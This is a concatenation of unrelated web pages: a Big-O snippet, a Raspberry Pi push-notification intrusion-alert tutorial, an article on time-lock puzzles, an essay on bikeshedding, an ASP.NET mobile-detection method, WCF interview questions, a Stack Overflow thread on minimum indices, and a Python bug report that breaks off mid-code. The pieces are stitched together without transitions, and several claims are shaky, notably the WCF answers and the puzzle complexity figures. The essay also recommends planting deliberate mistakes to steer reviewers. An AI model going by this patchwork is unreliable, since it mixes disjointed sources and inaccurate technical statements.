            value=ast.Name(id='data', ctx=ast.Load()),
            slice=ast.Index(value=ast.Str(s=node.id)),
            ctx=node.ctx
        )

a2 = ast.fix_missing_locations(RewriteName().visit(a))
I am reopening this as a doc bug because RewriteName is a copy (with 'ast.' prefixes added) of a buggy example in the doc. The bug is that the new .value Name and Str attributes do not get the required 'lineno' and 'col_offset' attributes. As Armin said, copy_location is not recursive and does not fix children of the node it fixes. Also, the recursive .visit method does not recurse into children of replacement nodes (and if it did, the new Str node would still not be fixed).
The fix could be to reuse the Name node and add another copy_location call: the following works.
def visit_Name(self, node):
    return ast.copy_location(
        ast.Subscript(
            value=node,
            slice=ast.Index(value=ast.copy_location(
                ast.Str(s=node.id), node)),
            ctx=node.ctx),
        node)
The entry for NodeTransformer might mention that .visit does not recurse into replacement nodes.
The missing lineno error came up in this python-list thread:
I re-verified the problem, its presence in the doc, and the fix with 3.9.
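For readers landing on this issue with a current Python, the fix the thread converges on can be demonstrated end to end. This sketch uses the modern node spelling (ast.Constant and a bare slice expression, valid since Python 3.9) instead of the deprecated ast.Str/ast.Index used in the comments above:

```python
import ast

class RewriteName(ast.NodeTransformer):
    def visit_Name(self, node):
        # Replace each bare name with data['name']; the new nodes carry no
        # lineno/col_offset, so fix_missing_locations must run before compile.
        return ast.Subscript(
            value=ast.Name(id='data', ctx=ast.Load()),
            slice=ast.Constant(value=node.id),
            ctx=node.ctx)

tree = RewriteName().visit(ast.parse('foo', mode='eval'))
ast.fix_missing_locations(tree)
result = eval(compile(tree, '<unknown>', 'eval'), {'data': {'foo': 42}})
print(result)  # 42
```

Note that NodeTransformer does not descend into replacement nodes, so the Name('data') created inside visit_Name is not itself rewritten.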
New changeset 6680f4a9f5d15ab82b2ab6266c6f917cb78c919a by Pablo Galindo (Batuhan Taşkaya) in branch 'master':
bpo-3530: Add advice on when to correctly use fix_missing_locations in the AST docs (GH-17172)
New changeset e222b4c69f99953a14ded52497a9909e34fc3893 by Miss Islington (bot) in branch '3.7':
bpo-3530: Add advice on when to correctly use fix_missing_locations in the AST docs (GH-17172)
New changeset ef0af30e507a29dae03aae40459b9c44c96f260d by Miss Islington (bot) in branch '3.8':
bpo-3530: Add advice on when to correctly use fix_missing_locations in the AST docs (GH-17172)
weakref – Garbage-collectable references to objects
The weakref module supports weak references to objects. A normal reference increments the reference count on the object and prevents it from being garbage collected. This is not always desirable, either when a circular reference might be present or when building a cache of objects that should be deleted when memory is needed.
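As a concrete taste of the cache use case mentioned above, weakref.WeakValueDictionary holds its values only weakly, so cache entries disappear as soon as nothing else references them. A minimal sketch (written in Python 3 syntax, unlike the Python 2 listings below):

```python
import gc
import weakref

class ExpensiveObject(object):
    def __init__(self, name):
        self.name = name

cache = weakref.WeakValueDictionary()
obj = ExpensiveObject('one')
cache['one'] = obj

before = 'one' in cache   # True while a strong reference (obj) exists
del obj                   # drop the only strong reference
gc.collect()              # make the cleanup deterministic off-CPython too
after = 'one' in cache    # the entry vanished along with its value

print(before, after)      # True False
```

This is exactly the cache behavior described in the introduction: entries live only as long as their objects are needed elsewhere.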
References
Weak references to your objects are managed through the ref class. To retrieve the original object, call the reference object.
import weakref

class ExpensiveObject(object):

    def __del__(self):
        print '(Deleting %s)' % self

obj = ExpensiveObject()
r = weakref.ref(obj)

print 'obj:', obj
print 'ref:', r
print 'r():', r()

print 'deleting obj'
del obj
print 'r():', r()
In this case, since obj is deleted before the second call to the reference, the ref returns None.
$ python weakref_ref.py

obj: <__main__.ExpensiveObject object at 0x10046d410>
ref: <weakref at 0x100467838; to 'ExpensiveObject' at 0x10046d410>
r(): <__main__.ExpensiveObject object at 0x10046d410>
deleting obj
(Deleting <__main__.ExpensiveObject object at 0x10046d410>)
r(): None
Reference Callbacks
The ref constructor takes an optional second argument that should be a callback function to invoke when the referenced object is deleted.
import weakref

class ExpensiveObject(object):

    def __del__(self):
        print '(Deleting %s)' % self

def callback(reference):
    """Invoked when referenced object is deleted"""
    print 'callback(', reference, ')'

obj = ExpensiveObject()
r = weakref.ref(obj, callback)

print 'obj:', obj
print 'ref:', r
print 'r():', r()

print 'deleting obj'
del obj
print 'r():', r()
The callback receives the reference object as an argument, after the reference is “dead” and no longer refers to the original object. This lets you remove the weak reference object from a cache, for example.
$ python weakref_ref_callback.py

obj: <__main__.ExpensiveObject object at 0x10046c610>
ref: <weakref at 0x100468890; to 'ExpensiveObject' at 0x10046c610>
r(): <__main__.ExpensiveObject object at 0x10046c610>
deleting obj
callback( <weakref at 0x100468890; dead> )
(Deleting <__main__.ExpensiveObject object at 0x10046c610>)
r(): None
Proxies
Instead of using ref directly, it can be more convenient to use a proxy. Proxies can be used as though they were the original object, so you do not need to call the ref first to access the object.
import weakref

class ExpensiveObject(object):

    def __init__(self, name):
        self.name = name

    def __del__(self):
        print '(Deleting %s)' % self

obj = ExpensiveObject('My Object')
r = weakref.ref(obj)
p = weakref.proxy(obj)

print 'via obj:', obj.name
print 'via ref:', r().name
print 'via proxy:', p.name
del obj
print 'via proxy:', p.name
If the proxy is accessed after the referent object is removed, a ReferenceError exception is raised.
$ python weakref_proxy.py

via obj: My Object
via ref: My Object
via proxy: My Object
(Deleting <__main__.ExpensiveObject object at 0x10046b490>)
via proxy:
Traceback (most recent call last):
  File "weakref_proxy.py", line 26, in <module>
    print 'via proxy:', p.name
ReferenceError: weakly-referenced object no longer exists
Cyclic References
One use for weak references is to allow cyclic references without preventing garbage collection. This example illustrates the difference between using regular objects and proxies when a graph includes a cycle.
First, we need a Graph class that accepts any object given to it as the “next” node in the sequence. For the sake of brevity, this Graph supports a single outgoing reference from each node, which results in boring graphs but makes it easy to create cycles. The function demo() is a utility function to exercise the graph class by creating a cycle and then removing various references.
import gc
from pprint import pprint
import weakref

class Graph(object):
    def __init__(self, name):
        self.name = name
        self.other = None
    def set_next(self, other):
        print '%s.set_next(%s (%s))' % (self.name, other, type(other))
        self.other = other
    def all_nodes(self):
        "Generate the nodes in the graph sequence."
        yield self
        n = self.other
        while n and n.name != self.name:
            yield n
            n = n.other
        if n is self:
            yield n
        return
    def __str__(self):
        return '->'.join([n.name for n in self.all_nodes()])
    def __repr__(self):
        return '%s(%s)' % (self.__class__.__name__, self.name)
    def __del__(self):
        print '(Deleting %s)' % self.name
        self.set_next(None)

class WeakGraph(Graph):
    def set_next(self, other):
        if other is not None:
            # See if we should replace the reference
            # to other with a weakref.
            if self in other.all_nodes():
                other = weakref.proxy(other)
        super(WeakGraph, self).set_next(other)
        return

def collect_and_show_garbage():
    "Show what garbage is present."
    print 'Collecting...'
    n = gc.collect()
    print 'Unreachable objects:', n
    print 'Garbage:',
    pprint(gc.garbage)

def demo(graph_factory):
    print 'Set up graph:'
    one = graph_factory('one')
    two = graph_factory('two')
    three = graph_factory('three')
    one.set_next(two)
    two.set_next(three)
    three.set_next(one)
    print
    print 'Graphs:'
    print str(one)
    print str(two)
    print str(three)
    collect_and_show_garbage()
    print
    three = None
    two = None
    print 'After 2 references removed:'
    print str(one)
    collect_and_show_garbage()
    print
    print 'Removing last reference:'
    one = None
    collect_and_show_garbage()
Now we can set up a test program using the gc module to help us debug the leak. The DEBUG_LEAK flag causes gc to print information about objects that cannot be seen other than through the reference the garbage collector has to them.
import gc
from pprint import pprint
import weakref

from weakref_graph import Graph, demo, collect_and_show_garbage

gc.set_debug(gc.DEBUG_LEAK)

print 'Setting up the cycle'
print
demo(Graph)

print
print 'Breaking the cycle and cleaning up garbage'
print
gc.garbage[0].set_next(None)
while gc.garbage:
    del gc.garbage[0]
print
collect_and_show_garbage()
Even after deleting the local references to the Graph instances in demo(), the graphs all show up in the garbage list and cannot be collected. The dictionaries in the garbage list hold the attributes of the Graph instances. We can forcibly delete the graphs, since we know what they are:
$ python -u weakref_cycle.py

Setting up the cycle

Set up graph:
one.set_next(two (<class 'weakref_graph.Graph'>))
two.set_next(three (<class 'weakref_graph.Graph'>))
three.set_next(one->two->three (<class 'weakref_graph.Graph'>))

Graphs:
one->two->three->one
two->three->one->two
three->one->two->three
Collecting...
Unreachable objects: 0
Garbage:[]

After 2 references removed:
one->two->three->one
Collecting...
Unreachable objects: 0
Garbage:[]

Removing last reference:
Collecting...
gc: uncollectable <Graph 0x10046ff50>
gc: uncollectable <Graph 0x10046ff90>
gc: uncollectable <Graph 0x10046ffd0>
gc: uncollectable <dict 0x100363060>
gc: uncollectable <dict 0x100366460>
gc: uncollectable <dict 0x1003671f0>
Unreachable objects: 6
Garbage:[Graph(one),
 Graph(two),
 Graph(three),
 {'name': 'one', 'other': Graph(two)},
 {'name': 'two', 'other': Graph(three)},
 {'name': 'three', 'other': Graph(one)}]

Breaking the cycle and cleaning up garbage

one.set_next(None (<type 'NoneType'>))
(Deleting two)
two.set_next(None (<type 'NoneType'>))
(Deleting three)
three.set_next(None (<type 'NoneType'>))
(Deleting one)
one.set_next(None (<type 'NoneType'>))

Collecting...
Unreachable objects: 0
Garbage:[]
And now let’s define a more intelligent WeakGraph class that knows not to create cycles using regular references, but to use a weak reference (here, a proxy) when a cycle is detected.
import gc
from pprint import pprint
import weakref

from weakref_graph import Graph, demo

class WeakGraph(Graph):
    def set_next(self, other):
        if other is not None:
            # See if we should replace the reference
            # to other with a weakref.
            if self in other.all_nodes():
                other = weakref.proxy(other)
        super(WeakGraph, self).set_next(other)
        return

demo(WeakGraph)
Since the WeakGraph instances use proxies to refer to objects that have already been seen, as demo() removes all local references to the objects, the cycle is broken and the garbage collector can delete the objects for us.
$ python weakref_weakgraph.py

Set up graph:
one.set_next(two (<class '__main__.WeakGraph'>))
two.set_next(three (<class '__main__.WeakGraph'>))
three.set_next(one->two->three (<type 'weakproxy'>))

Graphs:
one->two->three
two->three->one->two
three->one->two->three
Collecting...
Unreachable objects: 0
Garbage:[]

After 2 references removed:
one->two->three
Collecting...
Unreachable objects: 0
Garbage:[]

Removing last reference:
(Deleting one)
one.set_next(None (<type 'NoneType'>))
(Deleting two)
two.set_next(None (<type 'NoneType'>))
(Deleting three)
three.set_next(None (<type 'NoneType'>))
Collecting...
Unreachable objects: 0
Garbage:[]
Caching Objects
The ref and proxy classes are considered “low level”. While they are useful for maintaining weak references to individual objects and allowing cycles to be garbage collected, if you need to create a cache of several objects, the WeakKeyDictionary and WeakValueDictionary classes provide a more appropriate API.
As you might expect, the WeakValueDictionary uses weak references to the values it holds, allowing them to be garbage collected when other code is not actually using them.
To illustrate the difference between memory handling with a regular dictionary and WeakValueDictionary, let’s experiment with explicitly calling the garbage collector again:
import gc
from pprint import pprint
import weakref

gc.set_debug(gc.DEBUG_LEAK)

class ExpensiveObject(object):
    def __init__(self, name):
        self.name = name
    def __repr__(self):
        return 'ExpensiveObject(%s)' % self.name
    def __del__(self):
        print '(Deleting %s)' % self

def demo(cache_factory):
    # hold objects so any weak references
    # are not removed immediately
    all_refs = {}
    # the cache using the factory we're given
    print 'CACHE TYPE:', cache_factory
    cache = cache_factory()
    for name in [ 'one', 'two', 'three' ]:
        o = ExpensiveObject(name)
        cache[name] = o
        all_refs[name] = o
        del o  # decref

    print 'all_refs =',
    pprint(all_refs)
    print 'Before, cache contains:', cache.keys()
    for name, value in cache.items():
        print '  %s = %s' % (name, value)
        del value  # decref

    # Remove all references to our objects except the cache
    print 'Cleanup:'
    del all_refs
    gc.collect()

    print 'After, cache contains:', cache.keys()
    for name, value in cache.items():
        print '  %s = %s' % (name, value)
    print 'demo returning'
    return

demo(dict)
print
demo(weakref.WeakValueDictionary)
Notice that any loop variables that refer to the values we are caching must be cleared explicitly to decrement the reference count on the object. Otherwise the garbage collector would not remove the objects and they would remain in the cache. Similarly, the all_refs variable is used to hold references to prevent them from being garbage collected prematurely.
$ python weakref_valuedict.py

CACHE TYPE: <type 'dict'>
all_refs ={'one': ExpensiveObject(one),
 'three': ExpensiveObject(three),
 'two': ExpensiveObject(two)}
Before, cache contains: ['three', 'two', 'one']
  three = ExpensiveObject(three)
  two = ExpensiveObject(two)
  one = ExpensiveObject(one)
Cleanup:
After, cache contains: ['three', 'two', 'one']
  three = ExpensiveObject(three)
  two = ExpensiveObject(two)
  one = ExpensiveObject(one)
demo returning
(Deleting ExpensiveObject(three))
(Deleting ExpensiveObject(two))
(Deleting ExpensiveObject(one))

CACHE TYPE: weakref.WeakValueDictionary
all_refs ={'one': ExpensiveObject(one),
 'three': ExpensiveObject(three),
 'two': ExpensiveObject(two)}
Before, cache contains: ['three', 'two', 'one']
  three = ExpensiveObject(three)
  two = ExpensiveObject(two)
  one = ExpensiveObject(one)
Cleanup:
(Deleting ExpensiveObject(three))
(Deleting ExpensiveObject(two))
(Deleting ExpensiveObject(one))
After, cache contains: []
demo returning
The WeakKeyDictionary works similarly but uses weak references for the keys instead of the values in the dictionary.
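A minimal sketch of that behavior (Resource and the metadata mapping are illustrative names, not from the text; written with Python 3 print() syntax):

```python
import gc
import weakref

class Resource(object):
    pass

# Keys are held weakly: when the last strong reference to a key
# disappears, its entry silently drops out of the dictionary.
metadata = weakref.WeakKeyDictionary()
r = Resource()
metadata[r] = {'opened': True}
print(len(metadata))  # 1

del r
gc.collect()
print(len(metadata))  # 0
```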
The library documentation for weakref (https://pymotw.com/2/weakref/index.html) contains a warning about using these classes.
I'm making a prog that converts a bitmap to a kind of binary stencil.
The data that gets written is the image width, followed by a bool signaling if the first pixel is on or not. The data after that is written as a sequence of short values each saying how many pixels to draw or skip.
My problem is that only 3 bytes are being written to the file and the on-off states never seem to flip. I added some debug output and it displays the first pixel on my bmp to have a value of 2293488 when it is black and should be 0.
The problem should be in the highlighted area. Also to test it there needs to be a 24bit bitmap image in the same directory called "test.bmp".
Cheers.

Code:
#include <iostream>
#include <fstream>
using namespace::std;

bool Convert(const char*, const char*);

int main()
{
    if(! Convert("test.bmp", "result.dat"))
        cout << "Error";
    else
        cout << "Success";
    cin.ignore();
}

// Converts 24bit bmp data to compressed format
bool Convert(const char* bmpFile, const char* outFile)
{
    short w, h;
    char bytes[3];
    bool state;
    int count = 0;

    //Set up streams
    ifstream in;
    ofstream out;
    in.open(bmpFile, ios::binary);
    if(! in.is_open())
        return false;
    out.open(outFile, ios::out);

    //Write the image width
    in.seekg(18, ios::beg);
    in.read((char *)&w, sizeof w);
    in.seekg(22, ios::beg);
    out.write(bytes, 2);
    in.read((char *)&h, sizeof h);
    cout << "Width: " << w << endl;
    cout << "Height: " << h << endl;

    //Write if first pixel is on or not
    in.seekg(54, ios::beg);
    in.read(bytes, 3);
    if(bytes)
        state = true;
    else
        state = false;
    out.write((char*)&state, 1);
    cout << "Pix 1: " << ((int)bytes & 0x00FFFFFF) << endl;
    cout << "State: " << state << endl;

    in.seekg(54, ios::beg);
    for(int y=h; y>0; y--)
    {
        for(int x=0; x<w; x++)
        {
            in.read((char*)&bytes, 3);
            if(state)
            {
                if(bytes)
                {
                    count++;
                }
                else
                {
                    out.write((char*)&count, 2);
                    cout << "On: " << count << endl;
                    count = 1;
                    state = false;
                }
            }
            else
            {
                if(!bytes)
                {
                    count++;
                }
                else
                {
                    out.write((char*)&count, 2);
                    cout << "Off: " << count << endl;
                    count = 1;
                    state = true;
                }
            }
        }
    }
    cout << "Counter at: " << count << endl;
    in.close();
    out.close();
    return true;
}
Ok, this warrants some explanation....
I use Windows to program, and up until a few months ago, i always used Microsoft Visual C++ IDE (2010, mainly).
But recently I wanted to start developing projects with multiple platforms in mind (desktops only, no mobile), and also to experiment with using multiple compilers on the same project, to start writing portable code (both platform-wise and compiler-wise).
So, in order to do this, i started using Code::Blocks with both GCC and VC10 as the compilers.
My current project is fairly large, but it hadn't been a problem until recently, and only when compiling with GCC.
I'll explain further.
When i compile my code using GCC, i get the error "file something.h": No such file or directory.
This would be trivial, if the file didn't actually exist, but i noticed that the problem is with the way GCC handles the relative paths to the included file.
Here's a concrete example:
In the "MaterialManager.h" file, i include:
#include "..\..\Shader Manager\_Manager\Program Shader Manager\ProgShaderManager.h"
Now, say that Renderer includes "MaterialManager.h" (which as above, in turn, includes "ProgShaderManager.h").
The problem, is that after a few nested includes, GCC expands this to something like:
D:\ZTUFF\Projects\EDGE\Source\Engine\Systems\Renderer\Render Engine\_Implementations\Render_GL_MultiPass\..\..\..\..\..\Gameplay\Core Objects\Light Object\..\..\..\Game\State Manager\..\..\Resource Managers\Material Manager\_Manager\MaterialManager.h
And this is what is printed in the build log, right before the "No such file or directory".
In my opinion, the reason it fails is that it exceeds the maximum path size for relative paths in Windows (the long string above has 250 characters, and I think that when GCC tries to append yet another file name, it exceeds the 260-character limit).
I've confirmed this: if I replace any #include path that gives an error with its absolute path, it works.
For example:
"D:\ZTUFF\Projects\EDGE\Source\Engine\Resources\Material Resource\MaterialResource.h"
I thought about prepending a macro of the project source code's absolute path to each #include path, but i would like to avoid if possible.
I should mention again, that VC10 never gave me this sort of problem.
Again, this may end up being a simple thing that I am simply unaware of, since I'm not very experienced with GCC; if someone could enlighten me on how to avoid this problem, I'd be quite thankful.
Thanks in advance, and if there's something that is not clear, I'll work to explain it better. | https://www.gamedev.net/topic/660367-include-file-not-found-in-gcc-due-to-path-size/ | CC-MAIN-2017-22 | en | refinedweb |
libraries change hardware state and should be deinitialized when they are no longer needed. To do so, either call deinit() or use a context manager.

For example:
import bitbangio
from board import *

with bitbangio.I2C(SCL, SDA) as i2c:
    i2c.scan()
This example will initialize the device, run scan() and then deinit() the hardware.
How To Construct Classes and Define Objects in Python 3
Introduction
Python is an object-oriented programming language.
One of the most important concepts in object-oriented programming is the distinction between classes and objects, which are defined as follows:
- Class — A blueprint created by a programmer for an object. This defines a set of attributes that will characterize any object that is instantiated from this class.
- Object — An instance of a class. This is the realized version of the class, where the class is manifested in the program.
These are used to create patterns (in the case of classes) and then make use of the patterns (in the case of objects).
In this tutorial, we’ll go through creating classes, instantiating objects, initializing attributes with the constructor method, and working with more than one object of the same class.
Classes
Classes are like a blueprint or a prototype that you can define to use to create objects.
We define classes by using the class keyword, similar to how we define functions by using the def keyword.

Let’s define a class called Shark that has two functions associated with it, one for swimming and one for being awesome:

class Shark:
    def swim(self):
        print("The shark is swimming.")

    def be_awesome(self):
        print("The shark is being awesome.")
Because these functions are indented under the class Shark, they are called methods. Methods are a special kind of function that are defined within a class.

The argument to these functions is the word self, which is a reference to objects that are made based on this class. To reference instances (or objects) of the class, self will always be the first parameter, but it need not be the only one.

Defining this class did not create any Shark objects, only the pattern for a Shark object that we can define later. That is, if you run the program above at this stage, nothing will be returned.
Creating the Shark class above provided us with a blueprint for an object.
Objects
An object is an instance of a class. We can take the Shark class defined above, and use it to create an object or instance of it.

We’ll make a Shark object called sammy:

sammy = Shark()
Here, we initialized the object sammy as an instance of the class by setting it equal to Shark().

Now, let’s use the two methods with the Shark object sammy:

sammy = Shark()
sammy.swim()
sammy.be_awesome()
The Shark object sammy is using the two methods swim() and be_awesome(). We called these using the dot operator (.), which is used to reference an attribute of the object. In this case, the attribute is a method and it’s called with parentheses, just as you would call a function.

Because the keyword self was a parameter of the methods as defined in the Shark class, the sammy object gets passed to the methods. The self parameter ensures that the methods have a way of referring to object attributes.

When we call the methods, however, nothing is passed inside the parentheses; the object sammy is being automatically passed with the dot operator.

Let’s add the object within the context of a program:
class Shark:
    def swim(self):
        print("The shark is swimming.")

    def be_awesome(self):
        print("The shark is being awesome.")


def main():
    sammy = Shark()
    sammy.swim()
    sammy.be_awesome()

if __name__ == "__main__":
    main()
Let’s run the program to see what it does:
- python shark.py
Output
The shark is swimming.
The shark is being awesome.
The object sammy calls the two methods in the main() function of the program, causing those methods to run.
The Constructor Method
The constructor method is used to initialize data. It is run as soon as an object of a class is instantiated. Also known as the __init__ method, it will be the first definition of a class and looks like this:

class Shark:
    def __init__(self):
        print("This is the constructor method.")
If you added the above __init__ method to the Shark class in the program above, the program would output the following without your modifying anything within the sammy instantiation:

Output
This is the constructor method.
The shark is swimming.
The shark is being awesome.
This is because the constructor method is automatically initialized. You should use this method to carry out any initializing you would like to do with your class objects.
Instead of using the constructor method above, let’s create one that uses a name variable that we can use to assign names to objects. We’ll pass name as a parameter and set self.name equal to name:

class Shark:
    def __init__(self, name):
        self.name = name
Next, we can modify the strings in our functions to reference the names, as below:

class Shark:
    def __init__(self, name):
        self.name = name

    def swim(self):
        # Reference the name
        print(self.name + " is swimming.")

    def be_awesome(self):
        # Reference the name
        print(self.name + " is being awesome.")
Finally, we can set the name of the Shark object sammy as equal to "Sammy" by passing it as a parameter of the Shark class:

class Shark:
    def __init__(self, name):
        self.name = name

    def swim(self):
        print(self.name + " is swimming.")

    def be_awesome(self):
        print(self.name + " is being awesome.")


def main():
    # Set name of Shark object
    sammy = Shark("Sammy")
    sammy.swim()
    sammy.be_awesome()

if __name__ == "__main__":
    main()
We can run the program now:
- python shark.py
Output
Sammy is swimming.
Sammy is being awesome.
We see that the name we passed to the object is being printed out. We defined the __init__ method with the parameter name (along with the self keyword) and defined a variable within the method.
Because the constructor method is automatically initialized, we do not need to explicitly call it, only pass the arguments in the parentheses following the class name when we create a new instance of the class.
If we wanted to add another parameter, such as age, we could do so by also passing it to the __init__ method:

class Shark:
    def __init__(self, name, age):
        self.name = name
        self.age = age
Then, when we create our object sammy, we can pass Sammy’s age in our statement:

sammy = Shark("Sammy", 5)
To make use of age, we would need to also create a method in the class that calls for it.

Constructor methods allow us to initialize certain attributes of an object.
Working with More Than One Object
Classes are useful because they allow us to create many similar objects based on the same blueprint.
To get a sense for how this works, let’s add another Shark object to our program:

class Shark:
    def __init__(self, name):
        self.name = name

    def swim(self):
        print(self.name + " is swimming.")

    def be_awesome(self):
        print(self.name + " is being awesome.")


def main():
    sammy = Shark("Sammy")
    sammy.be_awesome()
    stevie = Shark("Stevie")
    stevie.swim()

if __name__ == "__main__":
    main()
We have created a second Shark object called stevie and passed the name "Stevie" to it. In this example, we used the be_awesome() method with sammy and the swim() method with stevie.
Let’s run the program:
- python shark.py
Output
Sammy is being awesome.
Stevie is swimming.
The output shows that we are using two different objects, the sammy object and the stevie object, both of the Shark class.
Classes make it possible to create more than one object following the same pattern without creating each one from scratch.
Conclusion

Object-oriented programs also make for better program design, since complex programs are difficult to write and require careful planning; this in turn makes it less work to maintain the program over time.
Opened 4 years ago
Closed 4 years ago
Last modified 4 years ago
#20584 closed Bug (needsinfo)
Django's Memcached backend get_many() doesn't handle generators
Description
When the "keys" parameter to get_many() is a generator, the values will be lost in the zip function.
Here's a simplified code example:
def make_key(k):
    return k

user_ids = (11387, 1304318)
keys = ('user_%d' % x for x in user_ids)
new_keys = map(lambda x: make_key(x), keys)
m = dict(zip(new_keys, keys))
assert( m == {} )
I believe this is related to this zip() behaviour:
I encountered this bug when upgrading from django 1.3 to django 1.5.1
Change History (2)
comment:1 Changed 4 years ago by
comment:2 Changed 4 years ago by
Ah, I misunderstood the problem myself, makes sense now. It worked in a previous version because the generator was not exhausted there.
thanks a lot, makes sense now
Hi,
The code example shows the expected behavior of a generator: once you iterate over it, it's empty.
Can you describe the actual bug you're encountering in your django application?
The commit that added the line you linked to [1] was already included in 1.3 so your problem must be elsewhere.
I'm going to mark this as
needsinfo. Please re-open the ticket with an example on how you trigger the issue from django.
Thanks.
[1] | https://code.djangoproject.com/ticket/20584 | CC-MAIN-2017-22 | en | refinedweb |
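A minimal, self-contained illustration of the generator behavior discussed in this ticket (once iterated, a generator yields nothing more):

```python
user_ids = (11387, 1304318)
keys = ('user_%d' % x for x in user_ids)

first_pass = list(keys)   # consumes the generator
second_pass = list(keys)  # already exhausted

print(first_pass)   # ['user_11387', 'user_1304318']
print(second_pass)  # []
```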
A FRAMEWORK FOR THE DYNAMIC
RECONFIGURATION OF SCIENTIFIC APPLICATIONS
IN GRID ENVIRONMENTS
By
Kaoutar El Maghraoui
A Thesis Submitted to the Graduate
Faculty of Rensselaer Polytechnic Institute
in Partial Fulfillment of the
Requirements for the Degree of
DOCTOR OF PHILOSOPHY
Major Subject: Computer Science
Approved by the
A FRAMEWORK FOR THE DYNAMIC
RECONFIGURATION OF SCIENTIFIC APPLICATIONS
IN GRID ENVIRONMENTS
By
Kaoutar El Maghraoui
An Abstract of a Thesis Submitted to the Graduate
Faculty of Rensselaer Polytechnic Institute
in Partial Fulfillment of the
Requirements for the Degree of
DOCTOR OF PHILOSOPHY
Major Subject: Computer Science
The original of the complete thesis is on file
in the Rensselaer Polytechnic Institute Library)
© Copyright 2007
by
Kaoutar El Maghraoui
CONTENTS
LIST OF FIGURES................................vii
LIST OF TABLES.................................xi
ACKNOWLEDGMENTS.............................xii
ABSTRACT....................................xiv
1.Introduction...................................1
1.1 Motivation and Research Challenges..................2
1.1.1 Mobility and Malleability for Fine-grained Reconfiguration..3
1.1.2 Middleware-driven Dynamic Application Reconfiguration...6
1.2 Problem Statement and Methodology..................8
1.3 Thesis Contributions...........................10
1.4 Thesis Roadmap.............................11
2.Background and Related Work.........................13
2.1 Grid Middleware Systems........................14
2.2 Resource Management in Grid Systems.................16
2.2.1 Resource Management in Globus................18
2.2.2 Resource Management in Condor................20
2.2.3 Resource Management in Legion.................21
2.2.4 Other Grid Resource Management Systems...........22
2.3 Adaptive Execution in Grid Systems..................23
2.4 Grid Programming Models........................25
2.5 Peer-to-Peer Systems and the Emerging Grid..............28
2.6 Worldwide Computing..........................31
2.6.1 The Actor Model.........................31
2.6.2 The SALSA Programming Language..............33
2.6.3 Theaters and Run-Time Components..............36
3.A Middleware Framework for Adaptive Distributed Computing.......37
3.1 Design Goals...............................38
3.1.1 Middleware-level Issues......................38
3.1.2 Application-level Issues......................39
3.2 A Model for Reconfigurable Grid-Aware Applications.........40
3.2.1 Characteristics of Grid Environments..............40
3.2.2 A Grid Application Model....................42
3.3 IOS Middleware Architecture......................47
3.3.1 The Profiling Module.......................48
3.3.2 The Decision Module.......................51
3.3.3 The Protocol Module.......................52
3.4 The Reconfiguration and Profiling Interfaces..............53
3.4.1 The Profiling API.........................53
3.4.2 The Reconfiguration Decision API................55
3.5 Case Study: Reconfigurable SALSA Actors...............56
3.6 Chapter Summary............................57
4.Reconfiguration Protocols and Policies....................60
4.1 Network-Sensitive Virtual Topologies..................60
4.1.1 The Peer-to-Peer Topology...................61
4.1.2 The Cluster-to-Cluster Topology................62
4.1.3 Presence Management......................62
4.2 Autonomous Load Balancing Strategies.................63
4.2.1 Information Policy........................65
4.2.2 Transfer Policy..........................67
4.2.3 Peer Location Policy.......................69
4.2.4 Load Balancing and the Virtual Topology...........70
4.3 The Selection Policy...........................71
4.3.1 The Resource Sensitive Model..................71
4.3.2 Migration Granularity......................74
4.4 Split and Merge Policies.........................75
4.4.1 The Split Policy..........................75
4.4.2 The Merge Policy.........................76
4.5 Related Work...............................77
4.6 Chapter Summary............................79
5.Reconfiguring MPI Applications........................80
5.1 Motivation.................................81
5.2 Approach to Reconfigurable MPI Applications.............82
5.2.1 The Computational Model....................82
5.2.2 Process Migration.........................84
5.2.3 Process Malleability.......................85
5.3 The Process Checkpointing Migration and Malleability Library....88
5.3.1 The PCM API..........................89
5.3.2 Instrumenting an MPI Program with PCM...........92
5.4 The Runtime Architecture........................92
5.4.1 The PCMD Runtime System..................96
5.4.2 The Profiling Architecture....................98
5.4.3 A Simple Scenario for Adaptation................99
5.5 The Middleware Interaction Protocol..................101
5.5.1 Actor Emulation.........................101
5.5.2 The Proxy Architecture.....................102
5.5.3 Protocol Messages........................102
5.6 Related Work...............................105
5.6.1 MPI Reconfiguration.......................105
5.6.2 Malleability............................107
5.7 Summary and Discussion.........................109
6.Performance Evaluation............................111
6.1 Experimental Testbed..........................111
6.2 Applications Case Studies........................112
6.2.1 Heat Diffusion Problem......................112
6.2.2 Search for the Galactic Structure................114
6.2.3 SALSA Benchmarks.......................114
6.3 Middleware Evaluation..........................115
6.3.1 Application-sensitive Reconfiguration Results.........115
6.3.2 Experiments with Dynamic Networks..............116
6.3.3 Experiments with Virtual Topologies..............119
6.3.4 Single vs.Group Migration...................125
6.3.5 Overhead Evaluation.......................125
6.4 Adaptation Experiments with Iterative MPI Applications.......128
6.4.1 Profiling Overhead........................129
6.4.2 Reconfiguration Overhead....................129
6.4.3 Performance Evaluation of MPI/IOS Reconfiguration.....131
6.4.3.1 Migration Experiments.................131
6.4.3.2 Split and Merge Experiments.............132
6.5 Summary and Discussion.........................135
7.Conclusions and Future Work.........................138
7.1 Other Application Models........................139
7.2 Large-scale Deployment and Security..................140
7.3 Replication as Another Reconfiguration Strategy............141
7.4 Scalable Profiling and Measurements..................141
7.5 Clustering Techniques for Resource Optimization...........142
7.6 Automatic Programming.........................142
7.7 Self-reconfigurable Middleware......................142
References......................................144
LIST OF FIGURES
1.1 Execution time without and with autonomous migration in a dynamic
run-time environment.............................4
1.2 Execution time with different entity granularities in a static run-time
environment..................................5
1.3 Throughput as the process data granularity decreases on a dedicated node.6
2.1 A layered grid architecture and components (Adapted from [14]).....15
2.2 Sample peer-to-peer topologies: centralized, decentralized and hybrid
topologies...................................30
2.3 A Model for Worldwide Computing.Applications run on a virtual net-
work (a middleware infrastructure) which maps actors to locations in the
physical layer (the hardware infrastructure)................32
2.4 The primitive operations of an actor. In response to a message, an actor
can: a) change its internal state by invoking one of its internal methods,
b) send a message to another actor, or c) create a new actor.......33
2.5 Skeleton of a SALSA program. The skeleton shows simple examples of
actor creation, message sending, coordination, and migration......34
3.1 Interactions between reconfigurable applications,the middleware ser-
vices,and the grid resources.........................42
3.2 A state machine showing the configuration states of an application at
reconfiguration points............................43
3.3 Model for a grid-aware application.....................46
3.4 The possible states of a reconfigurable entity................48
3.5 IOS Agents consist of three modules: a profiling module, a protocol module, and a decision module. The profiling module gathers performance profiles about the entities executing locally, as well as the underlying hardware. The protocol module gathers information from other agents. The decision module takes local and remote information and uses it to decide how the application entities should be reconfigured........49
3.6 Architecture of the profiling module: this module interfaces with high-
